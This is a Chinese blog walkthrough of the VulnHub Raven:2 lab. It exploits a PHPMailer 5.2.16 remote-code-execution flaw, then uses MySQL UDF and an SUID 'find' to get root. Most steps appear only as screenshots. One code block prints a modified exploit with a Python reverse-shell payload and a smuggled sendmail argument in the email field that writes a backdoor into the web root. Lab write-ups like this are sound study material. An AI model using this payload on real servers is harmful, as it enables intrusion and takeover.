vulnhub之mysql_udf提权

已于 2023-07-23 17:43:10 修改
阅读量398 收藏 1
点赞数
分类专栏: linux提权 渗透测试 文章标签: 数据库 linux mysql 安全
于 2023-03-09 23:28:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36585338/article/details/129433583
版权

Linux 提权——数据库 MYSQL_UDF

靶机环境

Raven: 2 ~ VulnHub

探针目标IP及端口

在这里插入图片描述

在这里插入图片描述

目录扫描

在这里插入图片描述

发现关键文件/目录 -访问测试

在这里插入图片描述

在这里插入图片描述

发现phpmailer(第三方)版本 5.2.16 - 存在远程代码执行漏洞

在这里插入图片描述

使用searchsploit搜索phpmailer漏洞exp

在这里插入图片描述

修改exp - 通过测试发现exp有些对方需要进行手动修改

exp修改内容如下:
target = input("输入目标地址(注意输入phpmailer功能地址,例如:contact.php):")
lhost = input("输入反弹主机IP:")
lport = input("输入反弹主机端口:")
backdoor = input("输入后门文件名(例如:Csec.php):")
payload = '<?php system(\'python -c """import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\'{lhost}\\\',{lport}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"])"""\'); ?>'.format(lhost=lhost,lport=lport)
#print(payload)
fields={'action': 'submit',
        'name': payload,
        'email': '"anarcoder\\\" -OQueueDirectory=/tmp -X/var/www/html/'+backdoor+' server\" @protonmail.com',
        'message': 'Pwned'}
#print(fields)

利用exp反弹shell

开启nc监听

在这里插入图片描述

执行exp

注意在执行exp后尝试访问生成的后门文件

在这里插入图片描述

反弹shell

在这里插入图片描述

写入/上传webshell - 前期探针到对方22端口开启 - 使用scp上传webshell

在这里插入图片描述

冰蝎连接webshell(可省略)

在这里插入图片描述

上传信息收集脚本 - 通过信息收集结果 - 来判断使用哪种提权手法

上传脚本方法选其一:

(1)可以继续使用scp上传

在这里插入图片描述

(2)webshell上传
(3)冰蝎反弹msf上传

执行脚本进行信息收集

在这里插入图片描述

在这里插入图片描述

发现mysql数据库 - 使用数据库udf提权

注意udf提权前提条件:知道数据库root密码 - 通过网站配置文件进行查找root密码

在这里插入图片描述

在这里插入图片描述

搜索mysql-udf提权exp - 编译exp -上传exp

搜索exp:

(1)使用searchsploit进行搜索

在这里插入图片描述

(2)网上查找

下载 mysql udf poc 进行编译:

在这里插入图片描述

上传1518 到目标服务器(任选其一):

(1)scp上传

在这里插入图片描述

(2)wget上传
(3)webshell上传
(4)msf反弹shell上传

进入数据库进行 UDF 导出:

注意insert into fool values(load_file(‘/var/www/html/1518.so’)); #注意1518.so要放在有权限的地方

在这里插入图片描述

在这里插入图片描述

查询find是否具有SUID权限?

在这里插入图片描述

配合使用 find 调用执行 - 注意切换目录进行suid提权

在这里插入图片描述

反弹root - shell

在这里插入图片描述

在这里插入图片描述

出顾茅庐
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【oscp系列-Raven-2】靶机3
weixin_44807430的博客
01-16 217
知行合一
VulnHub-Raven:2靶机渗透
ce666666的博客
02-04 3848
前言 通过VulnHub-Raven:2靶机渗透学习 攻击机:kali 靶机:Raven 网段:192.168.123.0/24 知识点: PHPMailer 小于5.2.18 (CVE-2016-10033) UDF提权 工具: LinEnum——Linux枚举漏洞工具 dirsearch——目录扫描工具 CVE-2016-10033 原理:PHPMailer mail()函数功能,远程攻击者利用默认开启的PHPMailer可以运行构造的恶意代码,无需登录触发该漏洞,从而导致获取系统权限。
linux环境下的MySQL UDF提权
最新发布
黑战士的博客
04-25 1302
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞提权的时候发现补丁全部被修补。这个时候需要利用第三方应用提权。当MYSQL权限比较高的时候我们就可以利用udf提权。###利用前提mysqlfuncfunc。
PHPMailer-5.2.16
09-22
PHPMailer-5.2.16
raven2
学习!冲冲冲!
06-12 714
raven2
渗透测试:MySQL数据库UDF提权详解
Bossfrank的博客
06-30 2600
本文介绍了渗透测试的常规提权方法——MySQL UDF提权。全面详解了UDFUDF提权原理与提权过程。以vulhub靶机pWnOS2.0为例,详解了提权的过程。读者可根据本文进行复现学习。
mysql.zip_ROOT_mysql提权_udf_udf mysql_提权
09-19
提权用的 udf 得到root帐号可以用这个提权
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
MYSQL_UDF-5.0.rar_mysql udf_udf_udf mysql
09-23
MySQL UDF(User Defined Function)是MySQL数据库系统中的一种扩展机制,允许用户自定义函数以满足特定的计算或处理需求。这些自定义函数通常用C或C++编写,然后编译为动态链接库(DLL),供MySQL服务器调用。本...
使用mysql_udf与curl库完成http_post通信模块示例
09-10
`mysql_udf`(MySQL User Defined Function)是MySQL提供的一种扩展机制,允许开发者使用C语言编写自定义函数,以增强数据库的功能。通过这个接口,我们可以创建自己的函数,使得MySQL能够调用C语言编写的模块来执行...
Linux提权mysql UDF提权
waxcj的博客
12-16 2049
linux mysql数据库提权
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
MySQL_UDF提权实验
多喝i热水的博客
11-13 4111
目录 0.环境下载: 1.扫描存活主机 2.目录猜解 3.反弹SHELL 0.环境下载: https://www.vulnhub.com/entry/raven-2,269/ 1.扫描存活主机 nmap -sn 192.168.217.0/24 2.目录猜解 dirb http://192.168.217.141/ http://192.168.217.141/vender 同时目录下还存在一个PHPMailerAutoload.php的文件,配合起来看应该是使用了5.2.16版本的
【学渗透靶机——Raven2(mysql-udf提权)】
jieli0901227的博客
06-17 431
既然有数据库,还有之前有个wordpress 的blog ,那么查找一下数据库配置文件,浏览完页面没有发现什么, 发现blog 是个wordpress CMS,有个搜索,尝试注入,使用sqlmap 跑了一下,没跑成功;主机开放有22,80,111,39169端口 ,22端口没有收集到账号密码信息,那么暴力ssh 消耗时间成本太大,,优先80端口。nmap漏洞探测没有发现可利用的漏洞信息,只有网站的路径枚举信息,,我们留着,后面查看。查看一下wordpress 的版本,已经限制,不能查看版本。
3-Raven2百个靶机渗透(精写-思路为主)
bmxch的博客
05-08 860
思路清晰先说步骤:1.信息收集,收集到应有的靶机可利用端口。2.用收集到的信息尝试爆破ssh,如果信息足够可用拿到普通用户,最好能一次拿到root3.根据系统版本搜索exp(常规提权),拿到root的shell4.对mysql udf的渗透、提权,思路为主。以上就是对这个靶机的渗透总结了,这里用了mysql udf提权,这个方法现在已经不常用了5.1以后的版本基本无法使用,但是思路是永不过期的,希望大家能好好学习思路,而不是花里胡哨的漏洞偏门。
Mysqludf实战提权
qq_45927819的博客
03-17 2488
文章目录环境扫描端口扫描目录反弹shelllinuxudf提权方式一方式二 环境 raven : 192.168.137.137 kali: 192.168.137.128 扫描端口 nmap -sS -Pn -A -p- -n 192.1678.137.137 扫描目录 dirb http://192.168.137.137 关键信息: 存在目录vendor,version下对应的是PHPMailer的版本:5.2.16 百度搜索:PHPMailer < 5.2.18 远程代码执行漏洞(C
oscp raven2靶机渗透过程
shatianyzg的博客
07-05 349
信息侦察阶段 用dirb扫描发现以下信息 ---- Entering directory: http://172.16.100.142/vendor/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode ‘-w’ if you want to scan it anyway) 找到第一个flag 寻找PHPMailer 5.2.16exp searchsploit phpmailer 拷贝exp到当前目录利用40
MySQL UDF 提权
small_cat's home
10-22 1839
UDF 全称 User Defind Function(用户自定义函数),用户通过自定义函数可以实现在 MySQL 中无法方便实现的功能,其添加的新函数都可以在 SQL 语句中调用,就像调用本机函数 version () 一样方便。UDF 提权是通过这样的方法来实现获取对方主机的system的shell权限,从而达到提权的目的。要实现 UDF 提权需要有一个动态链接库文件。
mysqludf提权
10-15
但是,如果攻击者能够创建自己的UDF并将其加载到MySQL中,则可以利用UDF提权攻击,从而获得系统管理员权限。 攻击者可以通过以下步骤进行UDF提权攻击: 1. 创建一个恶意的UDF库文件,其中包含提权代码。 2. 将恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值